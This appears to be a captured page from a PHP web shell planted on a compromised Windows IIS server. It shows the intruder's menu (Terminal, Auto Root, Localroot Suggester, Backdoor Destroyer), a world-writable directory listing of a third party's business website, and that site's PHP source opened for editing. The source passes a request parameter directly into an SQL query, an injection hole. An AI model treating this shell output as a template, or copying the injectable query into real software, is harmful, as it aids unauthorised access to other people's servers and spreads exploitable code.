Windows NT WIN-Q8QVV26RG2E 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : IWPD_83(secretsi)
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Inetpub /
vhosts /
mrugeshtrading.com /
lynxmachinery.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxrwxrwx
2021-06-18 15:03
App_Data
[ DIR ]
drwxrwxrwx
2023-01-25 15:30
Live-News
[ DIR ]
drwxrwxrwx
2021-06-18 13:03
News-Events
[ DIR ]
drwxrwxrwx
2021-06-18 14:43
admin
[ DIR ]
drwxrwxrwx
2022-01-19 09:56
api
[ DIR ]
drwxrwxrwx
2021-06-18 05:20
css
[ DIR ]
drwxrwxrwx
2021-06-18 05:21
images
[ DIR ]
drwxrwxrwx
2021-06-18 15:18
include
[ DIR ]
drwxrwxrwx
2021-06-18 05:23
javascripts
[ DIR ]
drwxrwxrwx
2021-06-18 05:21
reports
[ DIR ]
drwxrwxrwx
2024-09-11 09:03
style
[ DIR ]
drwxrwxrwx
2023-01-04 12:48
.user.ini
199
B
-rw-rw-rw-
2022-08-20 14:07
BOD.php
1.83
KB
-rw-rw-rw-
2023-03-14 06:39
aboutus.php
1.1
KB
-rw-rw-rw-
2023-03-14 06:40
admin.php
34.88
KB
-rw-rw-rw-
2023-09-17 08:20
companyprofile.php
857
B
-rw-rw-rw-
2021-07-05 07:53
contact.php
998
B
-rw-rw-rw-
2021-06-18 13:06
contact_action.php
768
B
-rw-rw-rw-
2015-07-03 12:33
download.php
2.99
KB
-rw-rw-rw-
2021-11-24 10:08
index.php
535
B
-rw-rw-rw-
2021-06-18 12:25
web.config
2.72
KB
-rw-rw-rw-
2023-01-27 09:42
Save
Rename
<?php require_once ('include/header.php'); ?> <?php require_once("api/lib/db_functions.php");?> <div id="content_header"></div> <div id="site_content"> <?php require_once('include/sidebar.php'); ?> <div id="content"> <?php global $report_category_name; $report_category_name = str_replace("-", " ", $_REQUEST['report_category_name']); $cf_arr = $obj->select("*","client_reports , report_category","client_reports.report_category_id = report_category.report_category_id AND report_category.report_category_name = '".$report_category_name."'ORDER BY report_id DESC"); // echo " // $kk=$cf_arr[0]['report_file_name']; // print_r($kk); ?> <table width="100%" class="tableborder" cellpadding="4" cellspacing="1" bordercolor="#eeeeee" border="0"> <tr bordercolor="#eeeeee"> <td height="20" bgcolor="#e7e3d6"><strong>Title</strong></td> <td height="20" bgcolor="#e7e3d6"><strong>Type</strong></td> <td height="20" bgcolor="#e7e3d6"><strong>Year</strong></td> <td height="20" bgcolor="#e7e3d6"><strong>Download</strong></td> </tr> <?php if(is_array($cf_arr)) { $i = 1; foreach($cf_arr as $adm_arr_key => $adm_arr_val) { // echo $adm_arr_val['cf_name'].' | '.$adm_arr_val['cf_email'].'|'.$adm_arr_val['cf_phone'].'|'.$adm_arr_val['cf_edu'].'|'.$adm_arr_val['msg'] ?> <tr bordercolor="#eeeeee"> <td width="60%" height="28" align="left"> <?=$adm_arr_val['report_caption']; ?> <br> <?=$adm_arr_val['report_desc'];?> </td> <td width="20%"><?=$adm_arr_val['report_type'];?></td> <td width="20%"><?=$adm_arr_val['report_year'];?></td> <td width="20%" align="center"> <a href="reports/<?= $adm_arr_val['report_file_name']; ?>" download> <img src="images/download.png" width="24" height="24" border="0" alt="Click Here To Download Form"></a> </td> </tr> <?php $i++; } } else { ?> <tr bordercolor="#eeeeee" align="center"> <td width="100%" height="28" align="center"><font color="#003366" size="1"> No Forms Available! </font></td> </tr> <?php } ?> </table> </div> </div> <div id="content_footer"></div> <?php require_once'include/footer.php'; ?>